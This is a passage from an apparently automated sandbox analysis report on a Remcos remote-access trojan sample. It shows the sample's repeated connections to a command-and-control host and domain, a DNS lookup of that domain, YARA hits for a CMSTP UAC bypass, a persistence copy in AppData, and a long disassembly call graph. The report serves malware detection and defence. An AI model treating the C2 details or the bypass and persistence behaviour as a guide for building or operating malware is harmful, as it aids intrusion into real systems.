                              gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                              WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 29, 2024 05:12:54.017630100 CET497041998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:12:55.019861937 CET497041998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:12:57.035459042 CET497041998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:01.035465956 CET497041998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:09.035430908 CET497041998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:16.052586079 CET497131998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:17.051122904 CET497131998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:19.051085949 CET497131998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:23.051068068 CET497131998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:31.051023006 CET497131998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:38.083698034 CET497141998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:39.097898006 CET497141998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:41.097934961 CET497141998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:45.113519907 CET497141998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:13:53.113586903 CET497141998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:00.131700039 CET497161998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:01.145840883 CET497161998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:03.285619974 CET497161998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:07.300962925 CET497161998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:15.300951958 CET497161998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:22.317720890 CET497181998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:23.488456964 CET497181998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:25.489357948 CET497181998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:29.488456964 CET497181998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:37.488524914 CET497181998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:44.505584002 CET497191998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:45.629630089 CET497191998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:47.631539106 CET497191998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:51.629125118 CET497191998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:14:59.629357100 CET497191998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:06.962080956 CET497201998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:07.988382101 CET497201998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:09.988495111 CET497201998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:13.988365889 CET497201998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:22.097752094 CET497201998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:29.428069115 CET497211998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:30.441488981 CET497211998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:32.441493034 CET497211998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:36.628978968 CET497211998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:44.629071951 CET497211998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:51.645648956 CET497221998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:52.786807060 CET497221998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:54.800833941 CET497221998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:15:58.800843954 CET497221998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:06.801326036 CET497221998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:13.817409992 CET497231998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:14.931226015 CET497231998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:17.035185099 CET497231998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:21.128943920 CET497231998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:29.161470890 CET497231998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:36.255134106 CET497241998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:37.441416979 CET497241998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:39.441401958 CET497241998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:43.535145998 CET497241998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:51.592703104 CET497241998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:58.755367994 CET497251998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:16:59.800759077 CET497251998192.168.2.5185.196.11.223
                              Mar 29, 2024 05:17:01.894644022 CET497251998192.168.2.5185.196.11.223

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 29, 2024 05:12:53.694591045 CET5275053192.168.2.51.1.1.1
                              Mar 29, 2024 05:12:54.013741016 CET53527501.1.1.1192.168.2.5
                              Mar 29, 2024 05:15:06.645446062 CET5162553192.168.2.51.1.1.1
                              Mar 29, 2024 05:15:06.960761070 CET53516251.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 29, 2024 05:12:53.694591045 CET192.168.2.51.1.1.10xfc4bStandard query (0)leetboy.dynuddns.netA (IP address)IN (0x0001)false
                              Mar 29, 2024 05:15:06.645446062 CET192.168.2.51.1.1.10x7c09Standard query (0)leetboy.dynuddns.netA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 29, 2024 05:12:54.013741016 CET1.1.1.1192.168.2.50xfc4bNo error (0)leetboy.dynuddns.net185.196.11.223A (IP address)IN (0x0001)false
                              Mar 29, 2024 05:15:06.960761070 CET1.1.1.1192.168.2.50x7c09No error (0)leetboy.dynuddns.net185.196.11.223A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:05:12:52
                              Start date:29/03/2024
                              Path:C:\Users\user\Desktop\1m70ggeepT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\1m70ggeepT.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1967511395.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:05:12:52
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, Virustotal, Browse
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:3
                              Start time:05:13:02
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:4
                              Start time:05:13:10
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:6
                              Start time:05:13:19
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.1%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:28.5%
                                Total number of Nodes:772
                                Total number of Limit Nodes:25
                                execution_graph 47018 434887 47019 434893 ___DestructExceptionObject 47018->47019 47045 434596 47019->47045 47021 43489a 47023 4348c3 47021->47023 47333 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47021->47333 47031 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47023->47031 47334 444251 5 API calls TranslatorGuardHandler 47023->47334 47025 4348dc 47027 4348e2 ___DestructExceptionObject 47025->47027 47335 4441f5 5 API calls TranslatorGuardHandler 47025->47335 47028 434962 47056 434b14 47028->47056 47031->47028 47336 4433e7 35 API calls 3 library calls 47031->47336 47038 434984 47039 43498e 47038->47039 47338 44341f 28 API calls _abort 47038->47338 47041 434997 47039->47041 47339 4433c2 28 API calls _abort 47039->47339 47340 43470d 13 API calls 2 library calls 47041->47340 47044 43499f 47044->47027 47046 43459f 47045->47046 47341 434c52 IsProcessorFeaturePresent 47046->47341 47048 4345ab 47342 438f31 10 API calls 4 library calls 47048->47342 47050 4345b0 47051 4345b4 47050->47051 47343 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47050->47343 47051->47021 47053 4345bd 47054 4345cb 47053->47054 47344 438f5a 8 API calls 3 library calls 47053->47344 47054->47021 47345 436e90 47056->47345 47058 434b27 GetStartupInfoW 47059 434968 47058->47059 47060 4441a2 47059->47060 47347 44f059 47060->47347 47062 434971 47065 40e9c5 47062->47065 47063 4441ab 47063->47062 47351 446815 35 API calls 47063->47351 47353 41cb50 LoadLibraryA GetProcAddress 47065->47353 47067 40e9e1 GetModuleFileNameW 47358 40f3c3 47067->47358 47069 40e9fd 47373 4020f6 47069->47373 47072 4020f6 28 API calls 47073 40ea1b 47072->47073 47379 41be1b 47073->47379 47077 40ea2d 47405 401e8d 47077->47405 47079 40ea36 47080 40ea93 47079->47080 47081 40ea49 47079->47081 47411 401e65 47080->47411 47610 40fbb3 116 API calls 47081->47610 47084 40eaa3 47088 401e65 22 API calls 47084->47088 47085 40ea5b 47086 401e65 22 API calls 47085->47086 47087 40ea67 47086->47087 47611 410f37 36 API calls __EH_prolog 47087->47611 47089 40eac2 47088->47089 47416 40531e 47089->47416 47092 40ead1 47421 406383 47092->47421 47093 40ea79 47612 40fb64 77 API calls 47093->47612 47096 40ea82 47613 40f3b0 70 API calls 47096->47613 47103 401fd8 11 API calls 47105 40eefb 47103->47105 47104 401fd8 11 API calls 47106 40eafb 47104->47106 47337 4432f6 GetModuleHandleW 47105->47337 47107 401e65 22 API calls 47106->47107 47108 40eb04 47107->47108 47438 401fc0 47108->47438 47110 40eb0f 47111 401e65 22 API calls 47110->47111 47112 40eb28 47111->47112 47113 401e65 22 API calls 47112->47113 47114 40eb43 47113->47114 47115 40ebae 47114->47115 47614 406c1e 28 API calls 47114->47614 47117 401e65 22 API calls 47115->47117 47122 40ebbb 47117->47122 47118 40eb70 47119 401fe2 28 API calls 47118->47119 47120 40eb7c 47119->47120 47123 401fd8 11 API calls 47120->47123 47121 40ec02 47442 40d069 47121->47442 47122->47121 47127 413549 3 API calls 47122->47127 47124 40eb85 47123->47124 47615 413549 RegOpenKeyExA 47124->47615 47126 40ec08 47128 40ea8b 47126->47128 47445 41b2c3 47126->47445 47134 40ebe6 47127->47134 47128->47103 47132 40ec23 47135 40ec76 47132->47135 47462 407716 47132->47462 47133 40f34f 47652 4139a9 30 API calls 47133->47652 47134->47121 47618 4139a9 30 API calls 47134->47618 47138 401e65 22 API calls 47135->47138 47141 40ec7f 47138->47141 47140 40f365 47653 412475 65 API calls ___scrt_get_show_window_mode 47140->47653 47149 40ec90 47141->47149 47150 40ec8b 47141->47150 47144 40ec42 47619 407738 30 API calls 47144->47619 47145 40ec4c 47146 401e65 22 API calls 47145->47146 47158 40ec55 47146->47158 47148 41bc5e 28 API calls 47155 40f37f 47148->47155 47154 401e65 22 API calls 47149->47154 47622 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47150->47622 47151 40ec47 47620 407260 97 API calls 47151->47620 47156 40ec99 47154->47156 47654 413a23 RegOpenKeyExW RegDeleteValueW 47155->47654 47466 41bc5e 47156->47466 47158->47135 47162 40ec71 47158->47162 47159 40eca4 47470 401f13 47159->47470 47621 407260 97 API calls 47162->47621 47163 40f392 47166 401f09 11 API calls 47163->47166 47168 40f39c 47166->47168 47170 401f09 11 API calls 47168->47170 47172 40f3a5 47170->47172 47171 401e65 22 API calls 47173 40ecc1 47171->47173 47655 40dd42 27 API calls 47172->47655 47178 401e65 22 API calls 47173->47178 47175 40f3aa 47656 414f2a 169 API calls _strftime 47175->47656 47179 40ecdb 47178->47179 47180 401e65 22 API calls 47179->47180 47181 40ecf5 47180->47181 47182 401e65 22 API calls 47181->47182 47184 40ed0e 47182->47184 47183 40ed7b 47185 40ed8a 47183->47185 47191 40ef06 ___scrt_get_show_window_mode 47183->47191 47184->47183 47186 401e65 22 API calls 47184->47186 47187 401e65 22 API calls 47185->47187 47194 40ee0f 47185->47194 47189 40ed23 _wcslen 47186->47189 47188 40ed9c 47187->47188 47190 401e65 22 API calls 47188->47190 47189->47183 47192 401e65 22 API calls 47189->47192 47193 40edae 47190->47193 47625 4136f8 RegOpenKeyExA RegQueryValueExA RegCloseKey 47191->47625 47195 40ed3e 47192->47195 47197 401e65 22 API calls 47193->47197 47215 40ee0a ___scrt_get_show_window_mode 47194->47215 47198 401e65 22 API calls 47195->47198 47199 40edc0 47197->47199 47200 40ed53 47198->47200 47203 401e65 22 API calls 47199->47203 47482 40da34 47200->47482 47201 40ef51 47202 401e65 22 API calls 47201->47202 47205 40ef76 47202->47205 47204 40ede9 47203->47204 47209 401e65 22 API calls 47204->47209 47626 402093 47205->47626 47208 401f13 28 API calls 47211 40ed72 47208->47211 47212 40edfa 47209->47212 47214 401f09 11 API calls 47211->47214 47540 40cdf9 47212->47540 47213 40ef88 47632 41376f 14 API calls 47213->47632 47214->47183 47215->47194 47623 413947 31 API calls 47215->47623 47219 40eea3 ctype 47223 401e65 22 API calls 47219->47223 47220 40ef9e 47221 401e65 22 API calls 47220->47221 47222 40efaa 47221->47222 47633 43baac 39 API calls _strftime 47222->47633 47226 40eeba 47223->47226 47225 40efb7 47227 40efe4 47225->47227 47634 41cd9b 87 API calls ___scrt_get_show_window_mode 47225->47634 47226->47201 47228 401e65 22 API calls 47226->47228 47232 402093 28 API calls 47227->47232 47230 40eed7 47228->47230 47233 41bc5e 28 API calls 47230->47233 47231 40efc8 CreateThread 47231->47227 47936 41d45d 10 API calls 47231->47936 47234 40eff9 47232->47234 47235 40eee3 47233->47235 47236 402093 28 API calls 47234->47236 47624 40f474 106 API calls 47235->47624 47238 40f008 47236->47238 47635 41b4ef 79 API calls 47238->47635 47239 40eee8 47239->47201 47240 40eeef 47239->47240 47240->47128 47242 40f00d 47243 401e65 22 API calls 47242->47243 47244 40f019 47243->47244 47245 401e65 22 API calls 47244->47245 47246 40f02b 47245->47246 47247 401e65 22 API calls 47246->47247 47248 40f04b 47247->47248 47636 43baac 39 API calls _strftime 47248->47636 47250 40f058 47251 401e65 22 API calls 47250->47251 47252 40f063 47251->47252 47253 401e65 22 API calls 47252->47253 47254 40f074 47253->47254 47255 401e65 22 API calls 47254->47255 47256 40f089 47255->47256 47257 401e65 22 API calls 47256->47257 47258 40f09a 47257->47258 47259 40f0a1 StrToIntA 47258->47259 47637 409de4 171 API calls _wcslen 47259->47637 47261 40f0b3 47262 401e65 22 API calls 47261->47262 47264 40f0bc 47262->47264 47263 40f101 47267 401e65 22 API calls 47263->47267 47264->47263 47638 4344ea 47264->47638 47271 40f111 47267->47271 47268 401e65 22 API calls 47269 40f0e4 47268->47269 47272 40f0eb CreateThread 47269->47272 47270 40f159 47274 401e65 22 API calls 47270->47274 47271->47270 47273 4344ea new 22 API calls 47271->47273 47272->47263 47932 419fb4 109 API calls 2 library calls 47272->47932 47275 40f126 47273->47275 47279 40f162 47274->47279 47276 401e65 22 API calls 47275->47276 47277 40f138 47276->47277 47280 40f13f CreateThread 47277->47280 47278 40f1cc 47281 401e65 22 API calls 47278->47281 47279->47278 47282 401e65 22 API calls 47279->47282 47280->47270 47930 419fb4 109 API calls 2 library calls 47280->47930 47284 40f1d5 47281->47284 47283 40f17e 47282->47283 47286 401e65 22 API calls 47283->47286 47285 40f21a 47284->47285 47287 401e65 22 API calls 47284->47287 47648 41b60d 80 API calls 47285->47648 47288 40f193 47286->47288 47291 40f1ea 47287->47291 47645 40d9e8 32 API calls 47288->47645 47290 40f223 47292 401f13 28 API calls 47290->47292 47296 401e65 22 API calls 47291->47296 47293 40f22e 47292->47293 47295 401f09 11 API calls 47293->47295 47298 40f237 CreateThread 47295->47298 47299 40f1ff 47296->47299 47297 40f1a6 47300 401f13 28 API calls 47297->47300 47303 40f264 47298->47303 47304 40f258 CreateThread 47298->47304 47931 40f7a7 120 API calls 47298->47931 47646 43baac 39 API calls _strftime 47299->47646 47302 40f1b2 47300->47302 47305 401f09 11 API calls 47302->47305 47306 40f279 47303->47306 47307 40f26d CreateThread 47303->47307 47304->47303 47933 4120f7 138 API calls 47304->47933 47309 40f1bb CreateThread 47305->47309 47311 40f2cc 47306->47311 47313 402093 28 API calls 47306->47313 47307->47306 47934 4126db 38 API calls ___scrt_get_show_window_mode 47307->47934 47309->47278 47935 401be9 49 API calls _strftime 47309->47935 47310 40f20c 47647 40c162 7 API calls 47310->47647 47650 4134ff RegOpenKeyExA RegQueryValueExA RegCloseKey 47311->47650 47314 40f29c 47313->47314 47649 4052fd 28 API calls 47314->47649 47318 40f2e4 47318->47172 47321 41bc5e 28 API calls 47318->47321 47322 40f2fd 47321->47322 47651 41361b 31 API calls 47322->47651 47327 40f313 47328 401f09 11 API calls 47327->47328 47331 40f31e 47328->47331 47329 40f346 DeleteFileW 47330 40f34d 47329->47330 47329->47331 47330->47148 47331->47329 47331->47330 47332 40f334 Sleep 47331->47332 47332->47331 47333->47021 47334->47025 47335->47031 47336->47028 47337->47038 47338->47039 47339->47041 47340->47044 47341->47048 47342->47050 47343->47053 47344->47051 47346 436ea7 47345->47346 47346->47058 47346->47346 47348 44f06b 47347->47348 47349 44f062 47347->47349 47348->47063 47352 44ef58 48 API calls 5 library calls 47349->47352 47351->47063 47352->47348 47354 41cb8f LoadLibraryA GetProcAddress 47353->47354 47355 41cb7f GetModuleHandleA GetProcAddress 47353->47355 47356 41cbb8 44 API calls 47354->47356 47357 41cba8 LoadLibraryA GetProcAddress 47354->47357 47355->47354 47356->47067 47357->47356 47657 41b4a8 FindResourceA 47358->47657 47362 40f3ed ctype 47667 4020b7 47362->47667 47365 401fe2 28 API calls 47366 40f413 47365->47366 47367 401fd8 11 API calls 47366->47367 47368 40f41c 47367->47368 47369 43bd51 ___std_exception_copy 21 API calls 47368->47369 47370 40f42d ctype 47369->47370 47673 406dd8 47370->47673 47372 40f460 47372->47069 47374 40210c 47373->47374 47375 4023ce 11 API calls 47374->47375 47376 402126 47375->47376 47377 402569 28 API calls 47376->47377 47378 402134 47377->47378 47378->47072 47727 4020df 47379->47727 47381 41be9e 47382 401fd8 11 API calls 47381->47382 47383 41bed0 47382->47383 47384 401fd8 11 API calls 47383->47384 47386 41bed8 47384->47386 47385 41bea0 47733 4041a2 28 API calls 47385->47733 47389 401fd8 11 API calls 47386->47389 47391 40ea24 47389->47391 47390 41beac 47392 401fe2 28 API calls 47390->47392 47401 40fb17 47391->47401 47394 41beb5 47392->47394 47393 401fe2 28 API calls 47400 41be2e 47393->47400 47396 401fd8 11 API calls 47394->47396 47395 401fd8 11 API calls 47395->47400 47397 41bebd 47396->47397 47734 41ce34 28 API calls 47397->47734 47400->47381 47400->47385 47400->47393 47400->47395 47731 4041a2 28 API calls 47400->47731 47732 41ce34 28 API calls 47400->47732 47402 40fb23 47401->47402 47404 40fb2a 47401->47404 47735 402163 11 API calls 47402->47735 47404->47077 47406 402163 47405->47406 47410 40219f 47406->47410 47736 402730 11 API calls 47406->47736 47408 402184 47737 402712 11 API calls std::_Deallocate 47408->47737 47410->47079 47412 401e6d 47411->47412 47413 401e75 47412->47413 47738 402158 22 API calls 47412->47738 47413->47084 47417 4020df 11 API calls 47416->47417 47418 40532a 47417->47418 47739 4032a0 47418->47739 47420 405346 47420->47092 47743 4051ef 47421->47743 47423 406391 47747 402055 47423->47747 47426 401fe2 47427 401ff1 47426->47427 47428 402039 47426->47428 47429 4023ce 11 API calls 47427->47429 47435 401fd8 47428->47435 47430 401ffa 47429->47430 47431 40203c 47430->47431 47433 402015 47430->47433 47432 40267a 11 API calls 47431->47432 47432->47428 47762 403098 28 API calls 47433->47762 47436 4023ce 11 API calls 47435->47436 47437 401fe1 47436->47437 47437->47104 47439 401fd2 47438->47439 47440 401fc9 47438->47440 47439->47110 47763 4025e0 28 API calls 47440->47763 47764 401fab 47442->47764 47444 40d073 CreateMutexA GetLastError 47444->47126 47765 41bfb7 47445->47765 47450 401fe2 28 API calls 47451 41b2ff 47450->47451 47452 401fd8 11 API calls 47451->47452 47453 41b307 47452->47453 47454 4135a6 31 API calls 47453->47454 47456 41b35d 47453->47456 47455 41b330 47454->47455 47457 41b33b StrToIntA 47455->47457 47456->47132 47458 41b352 47457->47458 47459 41b349 47457->47459 47461 401fd8 11 API calls 47458->47461 47774 41cf69 22 API calls 47459->47774 47461->47456 47463 40772a 47462->47463 47464 413549 3 API calls 47463->47464 47465 407731 47464->47465 47465->47144 